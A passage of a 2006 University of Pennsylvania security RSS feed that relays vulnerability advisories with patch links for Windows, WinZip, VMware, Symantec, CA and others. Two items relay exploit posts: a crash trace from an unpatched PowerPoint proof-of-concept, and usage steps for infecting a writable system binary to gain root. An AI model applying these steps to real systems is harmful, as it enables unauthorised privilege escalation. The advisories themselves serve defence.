<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
    <channel>
        <title>PENN Information Security</title>
        <description>This feed is hosted by the Office of Information Security for the University of Pennsylvania. We will post advisories in this feed that seem to possibly have an impact on University of Pennsylvania Students,Staff and Faculty. Urgent advisories will be posted to the appropriate University mailing lists as well.</description>
        <link>http://www.upenn.edu/computing/security</link>
        <copyright>2006 University of Pennsylvania</copyright>
        <lastBuildDate>Mon, 20 Nov 2006 10:45:37 -0500</lastBuildDate>
        <managingEditor>security@isc.upenn.edu</managingEditor>
        <pubDate>Mon, 20 Nov 2006 10:45:33 -0500</pubDate>
        <generator>FeedForAll Mac v1.6 (1.6.0.8)</generator>
        <item>
            <title>SGI Advanced Linux Environment Multiple Updates</title>
            <description><![CDATA[Secunia Advisory:   	 SA22929  	  <br>
Release Date: 	2006-11-16<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
Cross Site Scripting<br>
Privilege escalation<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	SGI Advanced Linux Environment 3<br>
<br>
<br>
CVE reference:	CVE-2005-3011 (Secunia mirror)<br>
CVE-2006-4574 (Secunia mirror)<br>
CVE-2006-4805 (Secunia mirror)<br>
CVE-2006-4810 (Secunia mirror)<br>
CVE-2006-4811 (Secunia mirror)<br>
CVE-2006-5462 (Secunia mirror)<br>
CVE-2006-5463 (Secunia mirror)<br>
CVE-2006-5464 (Secunia mirror)<br>
CVE-2006-5465 (Secunia mirror)<br>
CVE-2006-5467 (Secunia mirror)<br>
CVE-2006-5468 (Secunia mirror)<br>
CVE-2006-5469 (Secunia mirror)<br>
CVE-2006-5740 (Secunia mirror)<br>
CVE-2006-5747 (Secunia mirror)<br>
CVE-2006-5748 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
SGI has issued a patch for SGI Advanced Linux Environment. This fixes some vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges, and by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system.<br>
<br>
For more information:<br>
SA13123<br>
SA16816<br>
SA22380<br>
SA22590<br>
SA22653<br>
SA22722<br>
<br>
Solution:<br>
Apply patch 10345 for SGI ProPack 3 Service Pack 6.<br>
http://support.sgi.com/<br>
<br>
Original Advisory:<br>
ftp://patches.sgi.com/support/free/security/advisories/20061101-01-P.asc<br>
<br>
Other References:<br>
SA13123:<br>
http://secunia.com/advisories/13123/<br>
<br>
SA16816:<br>
http://secunia.com/advisories/16816/<br>
<br>
SA22380:<br>
http://secunia.com/advisories/22380/<br>
<br>
SA22590:<br>
http://secunia.com/advisories/22590/<br>
<br>
SA22653:<br>
http://secunia.com/advisories/22653/<br>
<br>
SA22722:<br>
http://secunia.com/advisories/22722/<br>
<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/22929/</link>
            <pubDate>Mon, 20 Nov 2006 10:43:56 -0500</pubDate>
        </item>

        <item>
            <title>WinZip FileView ActiveX Control Insecure Methods</title>
            <description><![CDATA[Secunia Advisory:   	 SA22891  	  <br>
Release Date: 	2006-11-15<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	WinZip 10.x<br>
<br>
CVE reference:	CVE-2006-5198 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in WinZip, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to several unspecified insecure methods in the FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61). This can be exploited to execute arbitrary code via a specially crafted web site.<br>
<br>
Successful exploitation requires that the user is tricked into visiting a malicious web site.<br>
<br>
The vulnerability is reported in WinZip 10.0 versions prior to Build 7245.<br>
<br>
Solution:<br>
Update to version 10.0 Build 7245.<br>
<br>
Provided and/or discovered by:<br>
Discovered by an anonymous person and reported via ZDI.<br>
<br>
Original Advisory:<br>
WinZip:<br>
http://www.winzip.com/wz7245.htm<br>
<br>
ZDI:<br>
http://www.zerodayinitiative.com/advisories/ZDI-06-040.html<br>
]]></description>
            <link>http://secunia.com/advisories/22891/</link>
            <pubDate>Wed, 15 Nov 2006 14:57:34 -0500</pubDate>
        </item>

        <item>
            <title>Microsoft Windows Client Service for Netware Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22866  	  <br>
Release Date: 	2006-11-14<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From local network<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Microsoft Windows 2000 Advanced Server<br>
Microsoft Windows 2000 Datacenter Server<br>
Microsoft Windows 2000 Professional<br>
Microsoft Windows 2000 Server<br>
Microsoft Windows Server 2003 Datacenter Edition<br>
Microsoft Windows Server 2003 Enterprise Edition<br>
Microsoft Windows Server 2003 Standard Edition<br>
Microsoft Windows Server 2003 Web Edition<br>
Microsoft Windows XP Home Edition<br>
Microsoft Windows XP Professional<br>
<br>
CVE reference:	CVE-2006-4688 (Secunia mirror)<br>
CVE-2006-4689 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Two vulnerabilities have been reported in Microsoft Windows, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.<br>
<br>
1) A boundary error in Client Service for Netware (CSNW) can be exploited to cause a buffer overflow via a specially crafted network message sent to the system.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
2) An unspecified error in Client Service for Netware can be exploited to cause the system to stop responding via a specially crafted network message.<br>
<br>
Solution:<br>
Apply patches.<br>
<br>
Microsoft Windows 2000 SP4:<br>
http://www.microsoft.com/downloads/de...=3cf0b0d1-ff07-40ac-a6ac-44dc4a54f91e<br>
<br>
Microsoft Windows XP SP2:<br>
http://www.microsoft.com/downloads/de...=2f54258f-1071-467b-80a2-e4dbfc050667<br>
<br>
Microsoft Windows Server 2003 (optionally with SP1):<br>
http://www.microsoft.com/downloads/de...=f23574f7-4033-45ac-8ad8-6cced2ee9285<br>
<br>
Provided and/or discovered by:<br>
1) The vendor credits Peter Winter-Smith of NGS Software and Sam Arun Raj of McAfee.<br>
2) The vendor credits Sam Arun Raj of McAfee.<br>
<br>
Original Advisory:<br>
MS06-066 (KB923980):<br>
http://www.microsoft.com/technet/security/Bulletin/MS06-066.mspx<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/22866/</link>
            <pubDate>Wed, 15 Nov 2006 14:56:50 -0500</pubDate>
        </item>

        <item>
            <title>VMware ESX Server Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22875  	  <br>
Release Date: 	2006-11-14<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	Security Bypass<br>
Exposure of sensitive information<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	VMware ESX Server 2.x<br>
<br>
CVE reference:	CAN-2004-2069 (Secunia mirror)<br>
CVE-2005-2177 (Secunia mirror)<br>
CVE-2005-2491 (Secunia mirror)<br>
CVE-2006-1056 (Secunia mirror)<br>
CVE-2006-1342 (Secunia mirror)<br>
CVE-2006-1343 (Secunia mirror)<br>
CVE-2006-1864 (Secunia mirror)<br>
CVE-2006-2071 (Secunia mirror)<br>
CVE-2006-3403 (Secunia mirror)<br>
CVE-2006-3467 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Some vulnerabilities, security issues, and a weakness have been reported in VMware ESX Server, which can be exploited by malicious, local users to bypass certain security restrictions and disclose potentially sensitive information, or by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.<br>
<br>
For more information:<br>
SA15930<br>
SA16793<br>
SA19357<br>
SA19657<br>
SA19724<br>
SA19869<br>
SA20100<br>
SA20980<br>
<br>
This also fixes a security issue is OpenSSH, which is caused due to an error in signaling child processes to terminate after the LoginGraceTime period has expired. This may be exploited to cause a DoS by preventing the daemon from accepting new connections.<br>
<br>
Solution:<br>
VMware ESX Server 2.0.2:<br>
Apply Upgrade Patch 2<br>
<br>
VMware ESX Server 2.1.3:<br>
Apply Upgrade Patch 2<br>
<br>
VMware ESX Server 2.5.3:<br>
Apply Upgrade Patch 4 (do not apply this patch to SunFire X4100 or X4200 servers).<br>
<br>
VMware ESX Server 2.5.4:<br>
Apply Upgrade Patch 1<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
http://www.vmware.com/download/esx/esx-253-200610-patch.html<br>
http://www.vmware.com/download/esx/esx-254-200610-patch.html<br>
http://www.vmware.com/download/esx/esx-213-200610-patch.html<br>
http://www.vmware.com/download/esx/esx-202-200610-patch.html<br>
<br>
Other References:<br>
SA15930:<br>
http://secunia.com/advisories/15930/<br>
<br>
SA16793:<br>
http://secunia.com/advisories/16793/<br>
<br>
SA19357:<br>
http://secunia.com/advisories/19357/<br>
<br>
SA19657:<br>
http://secunia.com/advisories/19657/<br>
<br>
SA19724:<br>
http://secunia.com/advisories/19724/<br>
<br>
SA19869:<br>
http://secunia.com/advisories/19869/<br>
<br>
SA20100:<br>
http://secunia.com/advisories/20100/<br>
<br>
SA20980:<br>
http://secunia.com/advisories/20980/<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/22875/</link>
            <pubDate>Wed, 15 Nov 2006 14:56:07 -0500</pubDate>
        </item>

        <item>
            <title>Microsoft Windows Workstation Service Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA22883  	  <br>
Release Date: 	2006-11-14<br>
Last Update: 	2006-11-15<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	System access<br>
Where: 	From local network<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Microsoft Windows 2000 Advanced Server<br>
Microsoft Windows 2000 Datacenter Server<br>
Microsoft Windows 2000 Professional<br>
Microsoft Windows 2000 Server<br>
Microsoft Windows XP Home Edition<br>
Microsoft Windows XP Professional<br>
<br>
CVE reference:	CVE-2006-4691 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
eEye Digital Security has reported a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to a boundary error in the Workstation Service (wkssvc.dll) within the "NetpManageIPCConnect()" function. This can be exploited to cause a buffer overflow via a specially crafted message sent to the system.<br>
<br>
This can e.g. be exploited via a NetrJoinDomain2 RPC call with an overly long MachineName in the second argument.<br>
<br>
Successful exploitation allows execution of arbitrary code, but requires Administrator privileges on Windows XP SP2.<br>
<br>
Solution:<br>
Apply patches.<br>
<br>
Microsoft Windows 2000 SP4:<br>
http://www.microsoft.com/downloads/de...=3ad5c57d-d3f6-46a1-8dee-3e16d0977f80<br>
<br>
Microsoft Windows XP SP2:<br>
http://www.microsoft.com/downloads/de...=f4c8e767-4ed2-4e36-aa43-612f3017efc7<br>
<br>
Provided and/or discovered by:<br>
JeongWook Matt Oh, eEye Digital Security.<br>
<br>
Changelog:<br>
2006-11-15: Added additional information from eEye Digital Security.<br>
<br>
Original Advisory:<br>
MS06-070 (KB924270):<br>
http://www.microsoft.com/technet/security/Bulletin/MS06-070.mspx<br>
<br>
eEye Digital Security:<br>
http://research.eeye.com/html/advisories/published/AD20061114.html<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/22883/</link>
            <pubDate>Wed, 15 Nov 2006 14:55:35 -0500</pubDate>
        </item>

        <item>
            <title>Microsoft Windows Flash Player Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22882  	  <br>
Release Date: 	2006-11-14<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Microsoft Windows XP Home Edition<br>
Microsoft Windows XP Professional<br>
<br>
CVE reference:	CVE-2006-3014 (Secunia mirror)<br>
CVE-2006-3311 (Secunia mirror)<br>
CVE-2006-3587 (Secunia mirror)<br>
CVE-2006-3588 (Secunia mirror)<br>
CVE-2006-4640 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Microsoft has acknowledged some vulnerabilities in Windows XP, which can be exploited by malicious people to bypass certain security restrictions or compromise a user's system.<br>
<br>
The vulnerabilities are caused due to the use of a vulnerable version of Adobe Flash Player.<br>
<br>
For more information:<br>
SA20971<br>
SA21865<br>
<br>
Solution:<br>
Apply patches.<br>
<br>
Microsoft Windows XP SP2:<br>
http://www.microsoft.com/downloads/de...=93208e57-5f14-4fb2-bc0c-2c4f3c56274a<br>
<br>
Microsoft Windows XP Professional x64 Edition:<br>
http://www.microsoft.com/downloads/de...=93208e57-5f14-4fb2-bc0c-2c4f3c56274a<br>
<br>
Original Advisory:<br>
MS06-069 (KB923789):<br>
http://www.microsoft.com/technet/security/Bulletin/MS06-069.mspx<br>
<br>
Other References:<br>
SA20971:<br>
http://secunia.com/advisories/20971/<br>
<br>
SA21865:<br>
http://secunia.com/advisories/21865/]]></description>
            <link>http://secunia.com/advisories/22882/</link>
            <pubDate>Wed, 15 Nov 2006 14:55:01 -0500</pubDate>
        </item>

        <item>
            <title>Microsoft Windows Agent ActiveX Control Buffer Overflow</title>
            <description><![CDATA[Secunia Advisory:   	 SA22878  	  <br>
Release Date: 	2006-11-14<br>
Last Update: 	2006-11-15<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Microsoft Windows 2000 Advanced Server<br>
Microsoft Windows 2000 Datacenter Server<br>
Microsoft Windows 2000 Professional<br>
Microsoft Windows 2000 Server<br>
Microsoft Windows Server 2003 Datacenter Edition<br>
Microsoft Windows Server 2003 Enterprise Edition<br>
Microsoft Windows Server 2003 Standard Edition<br>
Microsoft Windows Server 2003 Web Edition<br>
Microsoft Windows XP Home Edition<br>
Microsoft Windows XP Professional<br>
<br>
CVE reference:	CVE-2006-3445 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to an unspecified error in the Microsoft Agent ActiveX control when processing .ACF files. This can be exploited to cause a buffer overflow via a specially crafted .ACF file.<br>
<br>
Successful exploitation allows execution of arbitrary code when e.g. a malicious website is visited with Internet Explorer.<br>
<br>
Solution:<br>
Apply patches.<br>
<br>
Microsoft Windows 2000 SP4:<br>
http://www.microsoft.com/downloads/de...=c72ceec8-3e4d-4281-8183-11b724693217<br>
<br>
Microsoft Windows XP SP2:<br>
http://www.microsoft.com/downloads/de...=c16e1607-f396-4113-89f6-1fe89ec54b6a<br>
<br>
Microsoft Windows XP Professional x64 Edition:<br>
http://www.microsoft.com/downloads/de...=b4002a2a-b03e-4428-a26a-84293270d149<br>
<br>
Microsoft Windows Server 2003 (optionally with SP1):<br>
http://www.microsoft.com/downloads/de...=8f1a3f85-830b-4662-a4cc-8dff9f59acea<br>
<br>
Microsoft Windows Server 2003 for Itanium-based systems (optionally with SP1):<br>
http://www.microsoft.com/downloads/de...=b528f61d-ad54-4bad-b9a0-b650385de216<br>
<br>
Microsoft Windows Server 2003 x64 Edition:<br>
http://www.microsoft.com/downloads/de...=3da7ff4a-2389-4ce4-a6bb-b7e02f646b74<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Changelog:<br>
2006-11-15: Added US-CERT reference.<br>
<br>
Original Advisory:<br>
MS06-068 (KB920213):<br>
http://www.microsoft.com/technet/security/Bulletin/MS06-068.mspx<br>
<br>
Other References:<br>
US-CERT VU#810772:<br>
http://www.kb.cert.org/vuls/id/810772<br>
]]></description>
            <link>http://secunia.com/advisories/22878/</link>
            <pubDate>Wed, 15 Nov 2006 14:54:22 -0500</pubDate>
        </item>

        <item>
            <title>Microsoft Office 2003 PPT Local Buffer Overflow  PoC (UNPATCHED) NOT CONFIRMED</title>
            <description><![CDATA[Take this with a grain of salt until secunia or securityfocus releases and advisory.<br>
<br>
#PPT 0day poc <br>
#<br>
#OFFICE 2003 full Patch<br>
#<br>
#3001afbc 8b01             mov     eax,[ecx]         ds:0023:00000000=????????<br>
#3001afbe 56               push    esi<br>
#3001afbf ff5014           call    dword ptr [eax+0x14]<br>
#try control ecx.............:P<br>
#Maybe can Exploit<br>
#<br>
#<br>
#nanika@chroot.org<br>
#naninb@gmail.com<br>
#www.chroot.org]]></description>
            <link>http://milw0rm.com/exploits/2523</link>
            <pubDate>Thu, 12 Oct 2006 14:16:56 -0400</pubDate>
        </item>

        <item>
            <title>IBM WebSphere Application Server Three Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22372  	  <br>
Release Date: 	2006-10-11<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	Unknown<br>
Security Bypass<br>
Exposure of sensitive information<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	IBM WebSphere Application Server 6.1.x<br>
<br>
CVE reference:	CVE-2006-4223 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in IBM WebSphere Application Server, which can be exploited by malicious people to gain knowledge of potentially sensitive information or gain unautorised access.<br>
<br>
1) An unspecified error can be exploited to disclose the contents of JSP files.<br>
<br>
2) An error in the WSN security allows access when no user credentials (username/password) are supplied.<br>
<br>
3) An unspecified error may result in "possible security exposure".<br>
<br>
Solution:<br>
Apply version 6.1.0 Fix Pack 2 (6.1.0.2).<br>
http://www-1.ibm.com/support/docview.wss?rs=180&uid=swg24013142<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.]]></description>
            <link>http://secunia.com/advisories/22372/</link>
            <pubDate>Thu, 12 Oct 2006 14:15:39 -0400</pubDate>
        </item>

        <item>
            <title>Sun Solaris update for Apache 2</title>
            <description><![CDATA[Secunia Advisory:   	 SA22368  	  <br>
Release Date: 	2006-10-12<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	Cross Site Scripting<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Sun Solaris 10<br>
<br>
CVE reference:	CVE-2005-3352 (Secunia mirror)<br>
CVE-2005-3357 (Secunia mirror)<br>
CVE-2006-3747 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Sun has issued an update for Apache 2. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, cause a DoS (Denial of Service), and potentially compromise a vulnerable system.<br>
<br>
For more information:<br>
SA18008<br>
SA18307<br>
SA21197<br>
<br>
The vulnerability has been reported in Sun Solaris 10 for both the x86 and SPARC platform.<br>
<br>
Solution:<br>
Apply patches.<br>
<br>
Sun Solaris 10 for SPARC:<br>
Apply patch 120543-06 or later.<br>
http://sunsolve.sun.com/search/docume...setkey=urn:cds:docid:1-21-120543-06-1<br>
<br>
Sun Solaris 10 for x86:<br>
Apply patch 120544-06 or later.<br>
http://sunsolve.sun.com/search/docume...setkey=urn:cds:docid:1-21-120544-06-1<br>
<br>
Original Advisory:<br>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102662-1<br>
<br>
Other References:<br>
SA18008:<br>
http://secunia.com/advisories/18008/<br>
<br>
SA18307:<br>
http://secunia.com/advisories/18307/<br>
<br>
SA21197:<br>
http://secunia.com/advisories/21197/<br>
]]></description>
            <link>http://secunia.com/advisories/22368/</link>
            <pubDate>Thu, 12 Oct 2006 14:15:10 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: Infecting Elf Binaries to Gain Local Root Exploit</title>
            <description># gcc infR3.s -o infR3&lt;br&gt;
# strip infR3&lt;br&gt;
# find a writable binary (example: ls)&lt;br&gt;
# ./infR3 /bin/ls&lt;br&gt;
# when root calls the writable ls, chmod will be setuided&lt;br&gt;
# Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com&lt;br&gt;&lt;br&gt;</description>
            <link>http://www.milw0rm.com/exploits/2492</link>
            <pubDate>Mon, 09 Oct 2006 10:01:31 -0400</pubDate>
        </item>

        <item>
            <title>Symantec Products IOCTL Handler Privilege Escalation</title>
            <description><![CDATA[Secunia Advisory:   	 SA22288  	  <br>
Release Date: 	2006-10-06<br>
<br>
Critical: 	<br>
Less critical<br>
Impact: 	Privilege escalation<br>
Where: 	Local system<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	Symantec AntiVirus Corporate Edition 10.x<br>
Symantec AntiVirus Corporate Edition 8.x<br>
Symantec AntiVirus Corporate Edition 9.x<br>
Symantec AntiVirus for Blue Coat Security<br>
Symantec AntiVirus for CacheFlow Security Gateway<br>
Symantec AntiVirus for Clearswift 4.x<br>
Symantec AntiVirus for Inktomi Traffic Edge<br>
Symantec AntiVirus for Microsoft ISA Server 4.x<br>
Symantec AntiVirus for Microsoft SharePoint 4.x<br>
Symantec AntiVirus for NetApp Filer/NetCache<br>
Symantec AntiVirus Scan Engine 4.x<br>
Symantec Brightmail AntiSpam 4.x<br>
Symantec Brightmail AntiSpam 5.x<br>
Symantec Brightmail AntiSpam 6.x<br>
Symantec Client Security 1.x<br>
Symantec Client Security 2.x<br>
Symantec Client Security 3.x<br>
Symantec Mail Security for Domino 4.x<br>
Symantec Mail Security for Domino 5.x<br>
Symantec Mail Security for Exchange 4.x<br>
Symantec Mail Security for Microsoft Exchange 5.x<br>
Symantec Mail Security for SMTP 4.x<br>
Symantec Norton AntiVirus 2001<br>
Symantec Norton AntiVirus 2002<br>
Symantec Norton AntiVirus 2003<br>
Symantec Norton AntiVirus 2004<br>
Symantec Norton AntiVirus 2005<br>
Symantec Norton AntiVirus 2006<br>
Symantec Norton AntiVirus Corporate Edition 7.x<br>
Symantec Norton Internet Security 2001<br>
Symantec Norton Internet Security 2002<br>
Symantec Norton Internet Security 2003<br>
Symantec Norton Internet Security 2003 Professional<br>
Symantec Norton Internet Security 2004<br>
Symantec Norton Internet Security 2004 Professional<br>
Symantec Norton Internet Security 2005<br>
Symantec Norton Internet Security 2006<br>
Symantec Norton SystemWorks 2001<br>
Symantec Norton SystemWorks 2002<br>
Symantec Norton SystemWorks 2003<br>
Symantec Norton SystemWorks 2004<br>
Symantec Norton SystemWorks 2005<br>
Symantec Norton SystemWorks 2006<br>
Symantec Web Security 2.x<br>
Symantec Web Security 3.x<br>
<br>
CVE reference:	CVE-2006-4927 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in various Symantec Products, which can be exploited by malicious, local users to gain escalated privileges.<br>
<br>
The vulnerability is caused due to insufficient address space verification within the IOCTL handlers of the NAVEX15.SYS and NAVENG.SYS device drivers, which allows to overwrite arbitrary memory with a constant double word value. This can be exploited to execute arbitrary code with kernel privileges by sending specially crafted I/O Request Packets to the 0x222AD3, 0x222AD7, and 0x222ADB IOCTL handlers.<br>
<br>
The vulnerability has been reported in all versions of the following products for Windows NT, Windows 2000, and Windows XP:<br>
- Norton AntiVirus<br>
- Norton Internet Security<br>
- Norton System Works<br>
- Symantec AntiVirus Corporate Edition<br>
- Symantec AntiVirus for Blue Coat Security<br>
- Symantec AntiVirus for CacheFlow Security Gateway<br>
- Symantec AntiVirus for Clearswift MIME Sweeper<br>
- Symantec AntiVirus for Inktomi Traffic Edge<br>
- Symantec AntiVirus for Microsoft ISA Server<br>
- Symantec AntiVirus for NetApp Filer/NetCache<br>
- Symantec BrightMail AntiSpam<br>
- Symantec Client Security<br>
- Symantec Mail Security for Domino<br>
- Symantec Mail Security for Exchange<br>
- Symantec Mail Security for SMTP<br>
- Symantec Scan Engine<br>
- Symantec Web Security for Windows<br>
<br>
Solution:<br>
Update to the virus definitions of October 4, 2006 revision 9 or later.<br>
<br>
Provided and/or discovered by:<br>
Rubén Santamarta, reversemode.com.<br>
<br>
Original Advisory:<br>
Symantec:<br>
http://securityresponse.symantec.com/avcenter/security/Content/2006.10.05a.html<br>
<br>
iDEFENSE:<br>
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=417<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/22288/</link>
            <pubDate>Mon, 09 Oct 2006 09:41:57 -0400</pubDate>
        </item>

        <item>
            <title>CA Products Multiple Buffer Overflow Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22285  	  <br>
Release Date: 	2006-10-06<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	System access<br>
Where: 	From local network<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	BrightStor ARCserve Backup 11.x<br>
BrightStor ARCserve Backup 11.x (for Windows)<br>
BrightStor ARCserve Backup 9.x<br>
BrightStor Enterprise Backup 10.x<br>
CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2<br>
CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2<br>
CA Business Protection Suite r2<br>
CA Server Protection Suite r2<br>
<br>
CVE reference:	CVE-2006-5143 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in various CA products, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
1) Some boundary errors exist within RPC routines in the Backup Agent RPC Server (DBASRV.exe), which can be exploited to cause stack-based buffer overflows and allow arbitrary code execution.<br>
<br>
2) A boundary error exists in ASBRDCST.DLL when processing Discovery Service communication. This can be exploited to cause a stack-based buffer overflow and allows execution of arbitrary code.<br>
<br>
3) Two boundary errors exist within RPC routines in ASCORE.dll, used by the Message Engine RPC Server. These can be exploited to cause a heap-based buffer overflow and a stack-based buffer overflow by passing an overly long string as the second parameter, and allow arbitrary code execution.<br>
<br>
The following products for the Windows platform are affected:<br>
* BrightStor ARCserve Backup r11.5 SP1 and below (SP2 is not affected)<br>
* BrightStor ARCserve Backup r11.1<br>
* BrightStor ARCserve Backup for Windows r11<br>
* BrightStor Enterprise Backup 10.5<br>
* BrightStor ARCserve Backup v9.01<br>
* CA Server Protection Suite r2<br>
* CA Business Protection Suite r2<br>
* CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2<br>
* CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2<br>
<br>
Solution:<br>
Update to the latest version.<br>
http://supportconnect.ca.com<br>
<br>
Provided and/or discovered by:<br>
1) Pedram Amini, TippingPoint Security Research Team<br>
2,3) livesploit.com<br>
<br>
Original Advisory:<br>
1) TippingPoint:<br>
http://www.tippingpoint.com/security/advisories/TSRT-06-11.html<br>
<br>
2,3) Zero Day Initiative:<br>
http://www.zerodayinitiative.com/advisories/ZDI-06-030.html<br>
http://www.zerodayinitiative.com/advisories/ZDI-06-031.html<br>
<br>
CA:<br>
http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp<br>
]]></description>
            <link>http://secunia.com/advisories/22285/</link>
            <pubDate>Mon, 09 Oct 2006 09:41:05 -0400</pubDate>
        </item>

        <item>
            <title>Serv-U FTP Server OpenSSL Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA22284  	  <br>
Release Date: 	2006-10-06<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	Serv-U FTP Server 6.x<br>
<br>
CVE reference:	CVE-2006-2937 (Secunia mirror)<br>
CVE-2006-2940 (Secunia mirror)<br>
CVE-2006-3738 (Secunia mirror)<br>
CVE-2006-4343 (Secunia mirror)<br>
<br>
	Want to know the next time vulnerabilities are fixed in this product?<br>
- Companies can be alerted via email and SMS!<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in Serv-U FTP Server, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to the use of a vulnerable version of OpenSSL.<br>
<br>
For more information:<br>
SA22130<br>
<br>
Solution:<br>
Update to version 6.3.0.1.<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
http://www.serv-u.com/releasenotes/<br>
<br>
Other References:<br>
SA22130:<br>
http://secunia.com/advisories/22130/]]></description>
            <link>http://secunia.com/advisories/22284/</link>
            <pubDate>Mon, 09 Oct 2006 09:40:35 -0400</pubDate>
        </item>

        <item>
            <title>CA BrightStor ARCserver Backup Mailslot Buffer Overflow</title>
            <description><![CDATA[Secunia Advisory:   	 SA22283  	  <br>
Release Date: 	2006-10-06<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	System access<br>
Where: 	From local network<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	BrightStor ARCserve Backup 11.x<br>
<br>
CVE reference:	CVE-2006-5142 (Secunia mirror)<br>
<br>
